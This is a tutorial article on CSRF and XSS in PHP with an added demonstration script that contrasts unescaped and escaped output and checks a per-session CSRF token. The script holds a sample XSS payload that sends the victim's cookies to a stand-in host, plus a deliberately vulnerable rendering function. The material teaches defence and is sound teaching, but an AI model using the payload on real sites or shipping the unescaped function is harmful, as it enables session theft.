Monday 27 July 2009 1:59:13 am
(Author: Ilia Alshanetsky) Of all the vulnerabilities affecting web applications, especially those written in PHP, Cross-Site Request Forgery (CSRF) and Cross-Site Scripting (XSS) are by far the most prevalent. In many instances, developers downplay the severity of these threats and fail to take preventative action.
In this article, we will show you how CSRF and XSS work and how to defend against them. To dispel the myths about these attacks, I will assume the role of a hacker and show how the supposedly harmless injection of tiny bits of HTML can perform amazing things, from stealing the user's identity to a completely transparent rewrite of site content.
To get the most from this article, you should know the basics of PHP, HTML and JavaScript.
Let's start with a brief overview of CSRF and XSS. In both cases the attacker gets the hapless user's browser to do something the author of the site did not intend, at a moment when that browser is already authenticated to the site: handing over the user's cookies, submitting a form in the user's name, or rewriting what the user sees.
The difference between CSRF and XSS is the way in which the attack is delivered. XSS relies on the injection of arbitrary HTML or JavaScript into the vulnerable page itself, through non-validated input such as a field from a POST form submission or a URL parameter, so the attacker's code runs within the site's own origin. CSRF, on the other hand, injects nothing into the page: the attacker hosts the attack on another site and relies on the browser to carry it out, typically by having a hidden form or an image tag issue a request to the target site, to which the browser automatically attaches the user's session cookie.
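To make the two delivery paths concrete, here is an added example, not code from the article, in PHP. It shows a greeting page that reflects user input verbatim (the XSS case) beside the same page with output escaping, and a minimal per-session token that a forged cross-site form cannot know (the CSRF defense). The payload string and the session array are constructed for the demonstration; the script assumes PHP 7 or later for random_bytes() and hash_equals(), and it stands in for $_SESSION with a plain array so it runs from the command line.

```php
<?php
declare(strict_types=1);

// --- XSS: untrusted input rendered into HTML ---------------------------------

// Vulnerable: whatever arrives in $name becomes part of the page, tags included.
function render_greeting_vulnerable(string $name): string
{
    return "<p>Hello, $name!</p>";
}

// Hardened: every character that has meaning in HTML is escaped, so the input
// is displayed as text and never parsed as markup.
function render_greeting_safe(string $name): string
{
    return '<p>Hello, ' . htmlspecialchars($name, ENT_QUOTES | ENT_HTML5, 'UTF-8') . '!</p>';
}

// --- CSRF: a secret the cross-site attacker cannot supply ---------------------

// Issue (or reuse) a random token bound to the session. The real application
// would pass $_SESSION here; an array is used so the script runs without a server.
function csrf_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));   // 64 hex chars
    }
    return $session['csrf_token'];
}

// Verify a submitted form. hash_equals() compares in constant time, so the
// check does not leak the token byte by byte through timing differences.
function csrf_check(array $session, array $post): bool
{
    return isset($session['csrf_token'], $post['csrf_token'])
        && hash_equals($session['csrf_token'], (string) $post['csrf_token']);
}

// Form rendering: the token travels as a hidden field. A page on attacker.example
// can auto-submit a form to this URL, but it has no way to read this value.
function render_transfer_form(array &$session): string
{
    $token = htmlspecialchars(csrf_token($session), ENT_QUOTES, 'UTF-8');
    return '<form method="post" action="/transfer.php">'
         . '<input type="hidden" name="csrf_token" value="' . $token . '">'
         . '<input name="amount"><button>Send</button></form>';
}

// --- Demonstration with constructed input --------------------------------------

// Constructed attacker input (hypothetical host), as a site might receive it in ?name=
$payload = '<script>document.location="http://attacker.example/?c="+document.cookie</script>';

echo "Vulnerable output:\n", render_greeting_vulnerable($payload), "\n\n";
echo "Escaped output:\n",    render_greeting_safe($payload), "\n\n";

$session = [];                                   // stands in for $_SESSION
echo "Form with token:\n", render_transfer_form($session), "\n\n";

$legit  = ['amount' => '10', 'csrf_token' => $session['csrf_token']];
$forged = ['amount' => '10'];                    // a cross-site form cannot include the token

echo 'Legitimate submission accepted: ', var_export(csrf_check($session, $legit), true), "\n";
echo 'Forged submission accepted:     ', var_export(csrf_check($session, $forged), true), "\n";
```

Run it with `php` from the command line. The escaped greeting shows the payload as visible text instead of a script element, and only the submission carrying the session's token passes csrf_check(). Note that the token defends against CSRF only as long as the site has no XSS: script running in the site's origin can read the hidden field and submit the form itself, which is why the two fixes have to be applied together.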